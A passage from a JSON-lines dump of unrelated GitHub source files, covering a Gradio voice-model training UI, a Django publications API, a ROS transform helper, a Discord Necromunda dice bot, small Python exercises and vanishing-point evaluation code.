[np7, f0method8, pretrained_G14, pretrained_D15])\r\n gpus16 = gr.Textbox(label=\"以-分隔输入使用的卡号,例如 0-1-2 使用卡0和卡1和卡2\", value=gpus,interactive=True)\r\n but3 = gr.Button(\"训练模型\", variant=\"primary\")\r\n but4 = gr.Button(\"训练特征索引\", variant=\"primary\")\r\n but5 = gr.Button(\"一键训练\", variant=\"primary\")\r\n info3 = gr.Textbox(label=\"输出信息\", value=\"\",max_lines=10)\r\n but3.click(click_train,[exp_dir1,sr2,if_f0_3,spk_id5,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16,if_cache_gpu17],info3)\r\n but4.click(train_index,[exp_dir1],info3)\r\n but5.click(train1key,[exp_dir1,sr2,if_f0_3,trainset_dir4,spk_id5,gpus6,np7,f0method8,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16,if_cache_gpu17],info3)\r\n\r\n with gr.TabItem(\"ckpt处理\"):\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"模型融合,可用于测试音色融合\"\"\")\r\n with gr.Row():\r\n ckpt_a = gr.Textbox(label=\"A模型路径\", value=\"\", interactive=True)\r\n ckpt_b = gr.Textbox(label=\"B模型路径\", value=\"\", interactive=True)\r\n alpha_a = gr.Slider(minimum=0, maximum=1, label='A模型权重', value=0.5, interactive=True)\r\n with gr.Row():\r\n sr_ = gr.Radio(label=\"目标采样率\", choices=[\"32k\",\"40k\",\"48k\"],value=\"40k\", interactive=True)\r\n if_f0_ = gr.Radio(label=\"模型是否带音高指导\", choices=[\"是\",\"否\"],value=\"是\", interactive=True)\r\n info__ = gr.Textbox(label=\"要置入的模型信息\", value=\"\", max_lines=8, interactive=True)\r\n name_to_save0=gr.Textbox(label=\"保存的模型名不带后缀\", value=\"\", max_lines=1, interactive=True)\r\n with gr.Row():\r\n but6 = gr.Button(\"融合\", variant=\"primary\")\r\n info4 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n but6.click(merge, [ckpt_a,ckpt_b,alpha_a,sr_,if_f0_,info__,name_to_save0], info4)#def merge(path1,path2,alpha1,sr,f0,info):\r\n with gr.Group():\r\n gr.Markdown(value=\"修改模型信息(仅支持weights文件夹下提取的小模型文件)\")\r\n with gr.Row():\r\n ckpt_path0 = gr.Textbox(label=\"模型路径\", value=\"\", interactive=True)\r\n info_=gr.Textbox(label=\"要改的模型信息\", value=\"\", max_lines=8, interactive=True)\r\n name_to_save1=gr.Textbox(label=\"保存的文件名,默认空为和源文件同名\", value=\"\", max_lines=8, interactive=True)\r\n with gr.Row():\r\n but7 = gr.Button(\"修改\", variant=\"primary\")\r\n info5 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n but7.click(change_info, [ckpt_path0,info_,name_to_save1], info5)\r\n with gr.Group():\r\n gr.Markdown(value=\"查看模型信息(仅支持weights文件夹下提取的小模型文件)\")\r\n with gr.Row():\r\n ckpt_path1 = gr.Textbox(label=\"模型路径\", value=\"\", interactive=True)\r\n but8 = gr.Button(\"查看\", variant=\"primary\")\r\n info6 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n but8.click(show_info, [ckpt_path1], info6)\r\n with gr.Group():\r\n gr.Markdown(value=\"模型提取(输入logs文件夹下大文件模型路径),适用于训一半不想训了模型没有自动提取保存小文件模型,或者想测试中间模型的情况\")\r\n with gr.Row():\r\n ckpt_path2 = gr.Textbox(label=\"模型路径\", value=\"E:\\codes\\py39\\logs\\mi-test_f0_48k\\\\G_23333.pth\", interactive=True)\r\n save_name = gr.Textbox(label=\"保存名\", value=\"\", interactive=True)\r\n sr__ = gr.Radio(label=\"目标采样率\", choices=[\"32k\",\"40k\",\"48k\"],value=\"40k\", interactive=True)\r\n if_f0__ = gr.Radio(label=\"模型是否带音高指导,1是0否\", choices=[\"1\",\"0\"],value=\"1\", interactive=True)\r\n info___ = gr.Textbox(label=\"要置入的模型信息\", value=\"\", max_lines=8, interactive=True)\r\n but9 = gr.Button(\"提取\", variant=\"primary\")\r\n info7 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n ckpt_path2.change(change_info_,[ckpt_path2],[sr__,if_f0__])\r\n but9.click(extract_small_model, 
[ckpt_path2,save_name,sr__,if_f0__,info___], info7)\r\n\r\n        with gr.TabItem(\"招募音高曲线前端编辑器\"):\r\n            gr.Markdown(value=\"\"\"加开发群联系我xxxxx\"\"\")\r\n        with gr.TabItem(\"点击查看交流、问题反馈群号\"):\r\n            gr.Markdown(value=\"\"\"xxxxx\"\"\")\r\n\r\n    # app.launch(server_name=\"0.0.0.0\",server_port=7860)\r\n    # app.queue(concurrency_count=511, max_size=1022).launch(server_name=\"127.0.0.1\",inbrowser=True,server_port=7861,quiet=True)\r\n    app.queue(concurrency_count=511, max_size=1022).launch(server_name=\"0.0.0.0\",inbrowser=True,server_port=7865,quiet=True)","repo_name":"KaiservonAfrika/backupRVC","sub_path":"infer-web.py","file_name":"infer-web.py","file_ext":"py","file_size_in_byte":37603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26597433176","text":"import random\n\n\ndef choice():\n    # The original script called choice() without ever defining it; a random\n    # pick is assumed here as a minimal stand-in for each player's move.\n    return random.choice(['rock', 'paper', 'scissors'])\n\n\ndef compare(choice1, choice2):\n    \"\"\"play rock, paper, scissors\"\"\"\n    # The original repeated each elif branch, so the duplicates were\n    # unreachable and some matchups printed nothing; folded into if/else.\n    if choice1 == choice2:\n        print(\"Tie!\")\n    elif choice1 == 'rock':\n        if choice2 == 'scissors':\n            print(\"rock wins\")\n        else:\n            print(\"paper wins\")\n    elif choice1 == 'scissors':\n        if choice2 == 'paper':\n            print(\"scissors wins\")\n        else:\n            print(\"rock wins\")\n    elif choice1 == 'paper':\n        if choice2 == 'rock':\n            print(\"paper wins\")\n        else:\n            print(\"scissors wins\")\n\nrounds = int(input(\"enter number of rounds\"))\nplayer1_name = input(\"enter player1 name: \")\nplayer2_name = input(\"enter player2 name: \")\ncounter = 0\nwhile counter != rounds:\n    choice1 = choice()\n    choice2 = choice()\n    compare(choice1, choice2)\n    counter += 1\nprint(\"{} and {} would you like to play again?\".format(player1_name, player2_name))\n","repo_name":"agmacd3842/rps","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23668730716","text":"from django.db.models import Q\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import status, viewsets\nfrom rest_framework.filters import SearchFilter\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom npo_publication.models import Publication\nfrom npo_publication.serializers import PublicationSerializer, PublicationFavoriteSerializer, \\\n    PublicationFilterSearchSerializer\n\n\nclass PublicationAPIView(APIView, PageNumberPagination):\n    allow_methods = ['GET', 'POST']\n    serializer_class = PublicationSerializer\n\n    def get(self, request, *args, **kwargs):\n        query = request.query_params.get('query', '')\n        pub = Publication.objects.filter(Q(title__icontains=query) |\n                                         Q(description__icontains=query))\n        results = self.paginate_queryset(pub,\n                                         request,\n                                         view=self)\n        return self.get_paginated_response(self.serializer_class(results,\n                                                                 many=True,\n                                                                 context={'request': request}).data)\n\n    def post(self, request, *args, **kwargs):\n        title = request.data.get('title')\n        description = request.data.get('description')\n        created_date = request.data.get('created_date')\n        file = request.data.get('file')\n        pub = Publication.objects.create(title=title,\n                                         description=description,\n                                         created_date=created_date,\n                                         file=file)\n\n        pub.save()\n        return Response(data=self.serializer_class(pub).data,\n                        status=status.HTTP_200_OK)\n\n\nclass PublicationDetailAPIView(APIView):\n    
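# Retrieve, update, or delete a single Publication addressed by its id.\n    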
allow_methods = ['GET', 'PUT', 'DELETE']\n serializer_class = PublicationSerializer\n\n def get(self, request, id):\n pub = Publication.objects.get(id=id)\n return Response(data=self.serializer_class(pub).data)\n\n def put(self, request, id):\n pub = Publication.objects.get(id=id)\n title = request.data.get('title')\n description = request.data.get('description')\n created_date = request.data.get('created_date')\n file = request.data.get('file')\n pub.title = title\n pub.description = description\n pub.file = file\n\n pub.save()\n return Response(data=self.serializer_class(pub).data,\n status=status.HTTP_200_OK)\n\n def delete(self, request, id):\n pub = Publication.objects.get(id=id)\n pub.delete()\n\n return Response(data=self.serializer_class(pub).data,\n status=status.HTTP_202_ACCEPTED)\n\n\nclass PublicationFavoriteAPIView(APIView):\n allow_methods = ['GET', 'POST', 'DELETE']\n serializers_class = PublicationSerializer\n\n def get(self, request):\n checkbox = Publication.objects.filter(user=request.user)\n return Response(data=PublicationFavoriteSerializer(checkbox).data)\n\n def post(self, request):\n pub_id = int(request.data.get('pub_id'))\n checkbox = Publication.objects.get(pub_id=pub_id,\n user=request.user)\n checkbox.save()\n return Response(data=PublicationFavoriteSerializer(checkbox).data,\n status=status.HTTP_201_CREATED)\n\n def delete(self, request):\n pub_id = int(request.data.get('pub_id'))\n checkbox = Publication.objects.get(pub_id=pub_id,\n user_id=request.user)\n checkbox.delete()\n return Response(data=PublicationFavoriteSerializer(checkbox).data,\n status=status.HTTP_204_NO_CONTENT)\n\n\nclass PublicationFilterSearchView(viewsets.ModelViewSet):\n queryset = Publication.objects.all()\n serializer_class = PublicationFilterSearchSerializer\n filter_backends = [DjangoFilterBackend, SearchFilter]\n filterset_fields = ['title', 'description']\n search_fields = ['=title', '=description']\n ordering_fields = ['title']\n ordering = ['title']","repo_name":"akkbaeva/non_profit","sub_path":"npo_publication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1605108474","text":"import requests\nimport time\nimport asyncio\nimport aiohttp\nfrom requests import session\nfrom aiohttp import ClientSession\n\n\ndef get_api(s: session):\n url = \"https://mocki.io/v1/d4867d8b-b5d5-4a48-a4ab-79131b5809b8\"\n req = s.get(url).json()\n print(req)\n\n\ndef main():\n s = session()\n for i in range(3):\n get_api(s)\n\n\nasync def aio_get_api(s: ClientSession):\n url = \"https://mocki.io/v1/d4867d8b-b5d5-4a48-a4ab-79131b5809b8\"\n req = await s.get(url)\n \n print(await req.json())\n\n\nasync def aio_main():\n async with ClientSession() as session:\n task = [aio_get_api(session) for _ in range(3)]\n await asyncio.gather(*task)\n\nif __name__ == \"__main__\":\n s = time.perf_counter()\n asyncio.run(aio_main())\n # main()\n elapsed = time.perf_counter() - s\n print(f\"Code runtime: {elapsed}\")\n","repo_name":"wangshouh/asynio_blog","sub_path":"asynio_basic.py","file_name":"asynio_basic.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3286172935","text":"import rospy\nfrom tf import TransformListener, Transformer\nimport tf.transformations\nimport numpy as np\n\n\nclass Axis_transform:\n def __init__(self):\n self.listener = TransformListener()\n\n\n def 
tf_camera_to_base(self, camera_point, multi_dimention=False):\n        if multi_dimention:\n            return self.transform_coordinate_array('head_rgbd_sensor_rgb_frame', 'base_link', camera_point)\n        else:\n            return self.transform_coordinate('head_rgbd_sensor_rgb_frame', 'base_link',\n                                             [camera_point[0], camera_point[1], camera_point[2]])\n\n\n    def transform_coordinate(self, from_tf, to_tf, src_point):\n        # Missing from the original file although called above; assumed to be\n        # the single-point variant of transform_coordinate_array below.\n        out = self.transform_coordinate_array(from_tf, to_tf, np.array([src_point]))\n        return out[0]\n\n\n    def transform_coordinate_array(self, from_tf, to_tf, src_point_array):\n        # src_point must be xyz!\n        while not rospy.is_shutdown():\n            try:\n                (trans, rot) = self.listener.lookupTransform(to_tf, from_tf, rospy.Time(0))\n                break\n            except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n                continue\n        R = self.listener.fromTranslationRotation(trans, rot)\n        src_point_array = np.concatenate([src_point_array, np.ones((src_point_array.shape[0], 1))], axis=1)\n        out = np.dot(R, src_point_array.T)\n        out = out.T\n        return out[:, 0:-1]\n\nif __name__ == '__main__':\n    rospy.init_node('test_hsr_tf')\n    axis_tf = Axis_transform()\n    # Axis_transform defines no get_pose(), so the original demo call crashed;\n    # the author's commented-out round-trip test is enabled instead.\n    origin = np.array(([0.09911522, 0.04511706, 1.01600003],\n                       [0.09911522, 0.04511706, 1.01600003]))\n    print(origin)\n    base_link = axis_tf.transform_coordinate_array('head_rgbd_sensor_link', 'base_link', origin)\n    print(base_link)\n    camera_link = axis_tf.transform_coordinate_array('base_link', 'head_rgbd_sensor_link', base_link)\n    print(camera_link)\n\n","repo_name":"sehandev/AISys-JYD","sub_path":"utils_yolo/axis_transform.py","file_name":"axis_transform.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35426465090","text":"# Contains command for Necromunda related content and functions.\n# Started: 2021-01-17\n\nimport discord\nimport json\nimport random\nimport re\n\nfrom discord.ext import commands\nfrom KrigsBot import logger\nfrom KrigsBot import logCommand\n\n### Data Variables ###\nNC_SKILLS = \"./Data/Necromunda_Skills.json\"\n\n\nclass Necromunda(commands.Cog, name=\"Necromunda\"):\n    def __init__(self, bot):\n        self.bot = bot\n\n    ### Command - Necromunda ###\n    @commands.group(\n        aliases=['nc', 'necro'],\n        invoke_without_command=True,\n        case_insensitive=True\n    )\n    async def Necromunda(self, ctx):\n        await ctx.send_help(ctx.command)\n\n\n    @Necromunda.command(\n        help=\"Perform a roll (Injury, OOA, Recovery)\"\n    )\n    async def roll(self, ctx, type_of_roll: str):\n        logCommand(ctx)\n\n        if type_of_roll.lower() == \"injury\":\n            \n            roll_result = random.randint(1,6)\n            \n            FW_descriptions =[\n                'THEY HAVE WRONGED US!',\n                '...No, what you have are bullets, and the hope that when those bullets run out I will no longer be standing...',\n                'Wounds to be tended; lessons to be learned.',\n                'THE FLESH IS WEAK!',\n                'Remind yourself that overconfidence is a *slow* and *insidious* killer.'\n            ]\n\n            SI_descriptions =[\n                'How quickly the tide turns...',\n                'Death waits for the slightest lapse in concentration...',\n                'Dazed, reeling... about to break.',\n                'Ringing ears, blurred vision - the end approaches...',\n                'Teetering on the brink, facing the abyss...'\n            ]\n\n            OOA_descriptions =[\n                'TELL YOUR GODS I\'M COMING!',\n                'OH, THEY\' GONNA HAVE TO GLUE YOU BACK TOGETHER... 
IN.HELL!',\n 'Another life wasted in the pursuit of glory and gold.',\n 'A life spent not overcharging plasma, is a life lived in cowardice.',\n 'There can be no hope in this hell, no hope at all...'\n ]\n\n if roll_result in range(1,3):\n result = \"Flesh Wound\"\n result_text = \"The fighter suffers a *Flesh Wound*, reducing their Toughness characteristic by 1.\\nIf a fighter is reduced to Toughness 0, they go *Out Of Action*.\"\n result_color = discord.Color.green()\n result_description = random.choice(FW_descriptions)\n fileName = \"necromunda_FW.png\"\n file = discord.File(\"./Images/necromunda_FW.png\", filename=fileName)\n\n\n elif roll_result in range(3,6):\n result = \"Seriously Injured\"\n result_text = \"The fighter is *Prone* and laid face-down.\\nThey may successfully recover in a later end phase. If this injury was inflicted in close combat, the fighter may be vulnerable to a *Coup De Grace* action. \"\n result_color = discord.Color.gold()\n result_description = random.choice(SI_descriptions)\n fileName = \"necromunda_SI.png\"\n file = discord.File(\"./Images/necromunda_SI.png\", filename=fileName)\n\n else:\n result = \"Out Of Action\"\n result_text = \"The fighter is immediately removed from play.\"\n result_color = discord.Color.red()\n result_description = random.choice(OOA_descriptions)\n fileName = \"necromunda_OOA.png\"\n file = discord.File(\"./Images/necromunda_OOA.png\", filename=fileName)\n\n responseEmbed = discord.Embed(\n title= f\"Injury Dice: {result}\",\n color = result_color,\n description = f\"*{result_description}*\"\n )\n\n responseEmbed.add_field(name=\"Effect\",inline=False,value=result_text)\n responseEmbed.add_field(name=\"Dice roll\",inline=True,value=roll_result)\n responseEmbed.set_image(url=f\"attachment://{fileName}\")\n\n responseEmbed.set_footer(text=\"Source: Necromunda Rulebook (2018); p.71\")\n\n await ctx.send(file = file, embed=responseEmbed)\n\n\n @Necromunda.command(\n aliases=['skill']\n )\n async def skills(self, ctx, *, query=None):\n logCommand(ctx)\n \n\n with open(NC_SKILLS) as file:\n skillList = json.load(file)\n\n uniqueSkillGroup = sorted(set([skillList[skill]['skill_set'] for skill in skillList]))\n\n # Case 1: Invoked with no command, or the 'list' argument\n # Show the invoker a list of all available skills\n if query == None or query == \"list\":\n\n listEmbed = discord.Embed(\n title=f\"Necromunda Skill List\",\n color=discord.Color.blue(),\n description=f\"The following Skillset and skills are loaded\"\n )\n\n for skillgroup in uniqueSkillGroup:\n\n formattedskills = '\\n'.join([skillList[skill]['name'] for skill in skillList if skillList[skill]['skill_set'] == skillgroup])\n listEmbed.add_field(name=f'{skillgroup}', inline=True, value=f\"{formattedskills}\")\n\n await ctx.send(embed=listEmbed)\n\n # Case 2: Invoked with a skill set.\n # NOTE: Because Skill Sets are values, we shift the query into Title-case to match our values.\n elif query.title() in uniqueSkillGroup:\n\n output = \"\"\n\n \n for entry in [[skillList[skill]['skill_number'],skillList[skill]['name']] for skill in skillList if skillList[skill]['skill_set'] == query.title()]:\n output += f\"{entry[0]} - {entry[1]}\\n\"\n\n listEmbed = discord.Embed(\n title=f'Necromunda Skill Set: {query}',\n color=discord.Color.blue(),\n description=f'The {query} skill set contains the following skills:\\n\\n' + output)\n\n await ctx.send(embed=listEmbed)\n\n\n # Case 3: Invoked with a specific skill\n elif query in skillList:\n\n listEmbed = discord.Embed(\n 
title=f\"Necromunda skill: {skillList[query]['name']}\",\n color=discord.Color.blue(),\n description=f\"{skillList[query]['definition']}\")\n\n listEmbed.add_field(name='Skill Set',inline=True,value=f\"{skillList[query]['skill_set']}\")\n listEmbed.add_field(name='Skill Number',inline=True,value=f\"{skillList[query]['skill_number']}\")\n listEmbed.set_footer(text=f\"Source: {skillList[query]['source']}\")\n\n await ctx.send(embed=listEmbed)\n\n\n # Case 4: No hit in either the skill sets or skill list; lets try a regex match or bail with an apology\n else:\n logger.info(f\"No hit: Did not find term: {query} in Necromunda_Skills.json\")\n termlist = [element for element in skillList]\n \n regex = re.compile(f\".*{query}.*\")\n\n resultlist = list(filter(regex.match, termlist))\n\n if resultlist:\n response = \"```\"\n for term in resultlist:\n response += f\"- {skillList[term]['name'].ljust(22)}{skillList[term]['skill_set']}\\n\"\n \n response += \"```\"\n\n embedResult = discord.Embed(\n title=f\"No hits for {query} in Necromunda Skills\",\n color= discord.Color.red(),\n description=f\"No exact match found for {query}, but there were some partial hits:\"\n )\n\n embedResult.add_field(name=\"Partial hits\",inline=False,value=response)\n\n await ctx.send(embed=embedResult)\n\n else:\n\n embedResult = discord.Embed(\n title=f\"No hits at all for {query} in Necromunda Skills\",\n color=discord.Color.red(),\n description=f\"No hits at all for {query}; Perhaps it's called something else?\\n\\nTry '!nc skills list' for a list of all loaded skills.\"\n )\n\n await ctx.send(embed=embedResult)\n\n\n\n\n\ndef setup(bot):\n bot.add_cog(Necromunda(bot))\n","repo_name":"TurbulentQuasarPhenotype/KrigsBot","sub_path":"cogs/necromunda.py","file_name":"necromunda.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73643521171","text":"x=int(input())\nl = list(map(int,input().split()))\nc=0\nfor i in l:\n c+=i\n m = c//len(l)\nfor j in l:\n if m==j:\n print('True')\n break\nelse: print('False')","repo_name":"Nagendrasomisetti/codemind-python","sub_path":"Average_element_is_in_array_or_not.py","file_name":"Average_element_is_in_array_or_not.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19622454235","text":"from collections import defaultdict\nclass Solution:\n def longestConsecutive(self):\n nums = [100,4,200,1,3,2, 101]\n counts = []\n count = 0\n checker = 0 \n dd = defaultdict(int) \n s = set(nums)\n outputs = []\n start = False\n while checker != len(nums): \n if nums[checker] - 1 not in s and start == False: \n start = True\n else:\n checker += 1 \n start = False\n if start == True: \n count += 1 \n if nums[checker] + 1 not in s:\n start = False\n checker += 1 \n outputs.append(count)\n count = 0 \n else:\n nums[checker] += 1\n count += 1 \n print(outputs)\n\nsol = Solution()\nsol.longestConsecutive()","repo_name":"Lumiin0us/DSA_for_relaxation","sub_path":"longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34205436433","text":"import boto3\nimport traceback\nimport json\n\nmedialive_client = boto3.client(\"medialive\")\ndef lambda_handler(event, context):\n\n print(f\"Lambda got the following 
event:\\n{json.dumps(event)}\")\n try:\n if 'ChunkSourceDetail' in event['detail']:\n if 'ChannelId' in event['detail']['ChunkSourceDetail']:\n channel_id = event['detail']['ChunkSourceDetail']['ChannelId']\n response = medialive_client.describe_channel(\n ChannelId=channel_id\n )\n\n # Only start the channel if its Idle\n if response['State'] == 'IDLE':\n medialive_client.start_channel(\n ChannelId=channel_id\n )\n print(f\"Started Channel = {channel_id}\")\n else:\n print(f\"Channel = {channel_id} in Running State. Ignoring.\")\n except Exception as e:\n print(f\"Encountered an exception while starting MediaLive channel {str(e)}\")\n print(traceback.format_exc())\n raise\n ","repo_name":"awslabs/aws-media-replay-engine","sub_path":"source/backend/event-life-cycle/runtime/lambda/ChannelStarter.py","file_name":"ChannelStarter.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"66"} +{"seq_id":"74170607889","text":"from argparse import ArgumentParser\nfrom argparse import Namespace\n\nhi = Namespace()\nprint(hi)\nhi.hi = 1\nprint(hi.hi)\ndef get_args():\n parser = ArgumentParser(description='PyTorch/torchtext SNLI example')\n# parser.add_argument('--epochs', type=int, default=50)\n args = parser.parse_args()\n return args\n\nargs = get_args()\nprint(args)\n#print(args.epochs)\n\nargs.hi = 10\n\nprint(args.hi)","repo_name":"humorbeing/python_github","sub_path":"_SSSSSSandbox/playground_something/uu0003.py","file_name":"uu0003.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70706483731","text":"import numpy as np\nimport scipy.optimize\nimport sklearn.metrics\n\n\ndef single_eval(true_vps, estimated_vps, K_inverse, missing_vp_penalty=90.):\n\n true_num_vps = true_vps.shape[0]\n true_vds = (K_inverse * np.matrix(true_vps).T).T\n for vi in range(true_vds.shape[0]):\n true_vds[vi,:] /= np.maximum(np.linalg.norm(true_vds[vi,:]), 1e-16)\n\n estm_num_vps = estimated_vps.shape[0]\n num_missing_vps = true_num_vps-estm_num_vps\n num_vp_penalty = np.maximum(num_missing_vps, 0)\n\n estm_vds = (K_inverse * np.matrix(estimated_vps).T).T\n for vi in range(estm_vds.shape[0]):\n estm_vds[vi,:] /= np.maximum(np.linalg.norm(estm_vds[vi,:]), 1e-16)\n\n cost_matrix = np.arccos(np.abs(np.array(true_vds * estm_vds.T))) * 180. 
/ np.pi\n\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n\n errors = []\n for ri, ci in zip(row_ind, col_ind):\n errors += [cost_matrix[ri,ci]]\n if missing_vp_penalty > 0:\n errors += [missing_vp_penalty for _ in range(num_vp_penalty)]\n\n return errors, num_missing_vps\n\n\ndef calc_auc(error_array, cutoff=10.):\n\n error_array = error_array.squeeze()\n error_array = np.sort(error_array)\n num_values = error_array.shape[0]\n\n plot_points = np.zeros((num_values, 2))\n\n midfraction = 1.\n\n for i in range(num_values):\n fraction = (i + 1) * 1.0 / num_values\n value = error_array[i]\n plot_points[i, 1] = fraction\n plot_points[i, 0] = value\n if i > 0:\n lastvalue = error_array[i - 1]\n if lastvalue < cutoff < value:\n midfraction = (lastvalue * plot_points[i - 1, 1] + value * fraction) / (value + lastvalue)\n\n if plot_points[-1, 0] < cutoff:\n plot_points = np.vstack([plot_points, np.array([cutoff, 1])])\n else:\n plot_points = np.vstack([plot_points, np.array([cutoff, midfraction])])\n\n sorting = np.argsort(plot_points[:, 0])\n plot_points = plot_points[sorting, :]\n\n auc = sklearn.metrics.auc(plot_points[plot_points[:, 0] <= cutoff, 0],\n plot_points[plot_points[:, 0] <= cutoff, 1])\n auc = auc / cutoff\n\n return auc, plot_points\n\n\n\ndef single_eval_nyu(true_vps, estm_vps, separate_errors=True, normalised_coords=True, missing_vp_penalty=90.):\n\n fx_rgb = 5.1885790117450188e+02\n fy_rgb = 5.1946961112127485e+02\n cx_rgb = 3.2558244941119034e+02\n cy_rgb = 2.5373616633400465e+02\n\n S = np.matrix([[1. / 320., 0, -1.], [0, 1. / 320., -.75], [0, 0, 1]])\n K = np.matrix([[fx_rgb, 0, cx_rgb], [0, fy_rgb, cy_rgb], [0, 0, 1]])\n SK = S * K\n Kinv = K.I\n SKinv = SK.I\n\n invmat = SKinv if normalised_coords else Kinv\n\n true_num_vps = true_vps.shape[0]\n true_vds = (invmat * np.matrix(true_vps).T).T\n for vi in range(true_vds.shape[0]):\n true_vds[vi,:] /= np.maximum(np.linalg.norm(true_vds[vi,:]), 1e-16)\n\n estm_num_vps = estm_vps.shape[0]\n num_vp_penalty = np.maximum(true_num_vps-estm_num_vps, 0)\n\n missing_vps = -estm_num_vps+true_num_vps\n\n estm_vds = (invmat * np.matrix(estm_vps).T).T\n for vi in range(estm_vds.shape[0]):\n estm_vds[vi,:] /= np.maximum(np.linalg.norm(estm_vds[vi,:]), 1e-16)\n\n cost_matrix = np.arccos(np.abs(np.array(true_vds * estm_vds.T))) * 180. / np.pi\n\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n loss = cost_matrix[row_ind, col_ind].sum() + num_vp_penalty * missing_vp_penalty\n\n errors = []\n for ri, ci in zip(row_ind, col_ind):\n errors += [cost_matrix[ri,ci]]\n if missing_vp_penalty > 0:\n errors += [missing_vp_penalty for _ in range(num_vp_penalty)]\n\n if separate_errors:\n return errors, missing_vps, row_ind, col_ind\n else:\n return loss, missing_vps, row_ind, col_ind\n\n\ndef single_eval_yud(invmat, true_vps, estm_vps, separate_errors=True, missing_vp_penalty=90.):\n\n true_num_vps = true_vps.shape[0]\n true_vds = (invmat * np.matrix(true_vps).T).T\n for vi in range(true_vds.shape[0]):\n true_vds[vi,:] /= np.maximum(np.linalg.norm(true_vds[vi,:]), 1e-16)\n\n estm_num_vps = estm_vps.shape[0]\n num_vp_penalty = np.maximum(true_num_vps-estm_num_vps, 0)\n\n estm_vds = (invmat * np.matrix(estm_vps).T).T\n for vi in range(estm_vds.shape[0]):\n estm_vds[vi,:] /= np.maximum(np.linalg.norm(estm_vds[vi,:]), 1e-16)\n\n cost_matrix = np.arccos(np.abs(np.array(true_vds * estm_vds.T))) * 180. 
/ np.pi\n\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n loss = cost_matrix[row_ind, col_ind].sum() + num_vp_penalty * missing_vp_penalty\n\n errors = []\n for ri, ci in zip(row_ind, col_ind):\n errors += [cost_matrix[ri,ci]]\n if missing_vp_penalty > 0:\n errors += [missing_vp_penalty for _ in range(num_vp_penalty)]\n\n if separate_errors:\n return errors, row_ind, col_ind\n else:\n return loss, row_ind, col_ind","repo_name":"fkluger/vp-linkage","sub_path":"util/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4891,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"646960060","text":"valor = int(input('Qual o valor a ser sacado? R$ '))\ntotal = valor\ncedula = 50\ntotced = 0\nwhile True:\n if total >= cedula:\n total -= cedula\n totced += 1\n else:\n if totced > 0:\n print(f'Total de {totced} cédula(s) de R$ {cedula:.2f}.')\n if cedula == 50:\n cedula = 20\n elif cedula == 20:\n cedula = 10\n elif cedula == 10:\n cedula = 1\n totced = 0 # o total de cédula sempre tem que voltar a zero, porque esgotou a qtdade e vai para outra\n if total == 0:\n break\n\n\n","repo_name":"sararrodolfo/cursoemvideo-python","sub_path":"pacote_dowload/exercicio071.py","file_name":"exercicio071.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70725084051","text":"\r\nfrom header import *\r\nfrom train import *\r\nfrom image_processing import *\r\n\r\ndef machine_learning():\r\n\tprint('*' * 20)\r\n\tprint('MACHINE LEARNING')\r\n\t\r\n\texecute('=' * 20 + '\\nTRAIN', train)\r\n\t\r\ndef process_video():\r\n\tprint('*' * 20)\r\n\tprint('PROCESS VIDEO')\r\n\t\r\n\tprint('Init')\r\n\tsvm = execute('Loading model', cv2.ml.SVM_load, svm_model_file)\r\n\ttemplates, templates_title = execute('Loading templates', load_templates)\r\n\r\n\tinp = cv2.VideoCapture(video_input)\r\n\tvideo_width = int(inp.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n\tvideo_height = int(inp.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\tvideo_fps = inp.get(cv2.CAP_PROP_FPS)\r\n\t\r\n\tprint('Video resolution: (' + str(video_width) + ', ' + str(video_height) + ')')\r\n\tprint('Video fps:', video_fps)\r\n\r\n\tout = cv2.VideoWriter(video_output, -1, video_fps, (normal_width, normal_height))\r\n\t\r\n\tprint('Video is running')\r\n\tinfo = []\r\n\t\r\n\tframe_id = 1\r\n\twhile inp.isOpened():\r\n\t\tret, frame = inp.read()\r\n\t\tif (not ret) or 